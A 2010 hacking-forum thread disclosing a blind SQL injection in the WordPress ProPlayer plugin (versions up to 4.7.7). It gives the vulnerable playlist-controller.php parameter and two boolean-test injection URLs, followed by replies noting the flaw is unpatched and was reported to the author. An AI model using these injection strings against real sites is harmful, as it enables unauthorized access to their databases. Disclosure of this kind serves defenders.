Author Topic: WP-ProPlayer Plugin Blind SQL Injection  (Read 3277 times)

0 Members and 1 Guest are viewing this topic.

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
WP-ProPlayer Plugin Blind SQL Injection
« on: December 11, 2010, 11:09:09 pm »
<-------

   WP-ProPlayer Blind SQL Inyection

   Founder: Ca0s

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL:
      http://wordpress.org/extend/plugins/proplayer/
      http://isagoksu.com/proplayer-wordpress-plugin/
   Vuln: Blind SQL Inyection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27 so wont work this way.

------->

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #1 on: December 12, 2010, 12:06:11 am »
Vulnerability status? I couldn't find any fix notes on their site.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #2 on: December 12, 2010, 12:58:06 am »
Unfixed.
I reported it to author.

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #3 on: December 12, 2010, 01:04:08 am »
Unfixed.
I reported it to author.

Sweet, better hope they fix it quick :P
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline solar

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #4 on: February 25, 2011, 07:24:13 pm »
Cool... nice find.